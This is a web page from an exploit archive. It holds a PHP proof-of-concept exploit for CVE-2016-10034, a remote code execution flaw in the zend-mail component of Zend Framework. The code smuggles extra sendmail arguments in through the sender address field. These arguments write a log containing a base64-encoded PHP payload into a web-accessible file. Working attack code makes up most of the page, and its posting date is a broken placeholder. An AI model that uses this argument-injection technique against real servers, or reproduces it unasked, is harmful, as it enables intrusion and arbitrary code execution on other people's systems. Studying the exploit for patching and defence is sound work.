Home / exploits Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><?php /* Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.4.11 zend-mail < 2.7.2 Discovered/Coded by: Dawid Golunski https://legalhackers.com Full Advisory URL: https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html Video PoC https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html Follow the feed for updates: https://twitter.com/dawid_golunski A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-r] Arg no. 4 == [attacker] Arg no. 5 == [-oQ/tmp/] Arg no. 6 == [-X/var/www/cache/phpcode.php] Arg no. 7 == ["@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. Note /var/www/cache must be writable by www-data web user. The resulting file will contain the payload passed in the body of the msg: 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< See the full advisory URL for the exploit details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form with sender field $email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; // encoded phpinfo() php code $msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="); // ------------------ // mail() param injection via the vulnerability in zend-mail chdir(dirname(__DIR__)); include 'vendor/Zend/Loader/AutoloaderFactory.php'; ZendLoaderAutoloaderFactory::factory(array( 'ZendLoaderStandardAutoloader' => array( 'autoregister_zf' => true ) )); ZendMvcApplication::init(require 'config/application.php')->run(); $message = new ZendMailMessage(); $message->setBody($msg_body); $message->setFrom($email_from, 'Attacker'); $message->addTo('support@localhost', 'Support'); $message->setSubject('Zend PoC'); $transport = new ZendMailTransportSendmail(); $transport->send($message); ?> </BODY></HTML>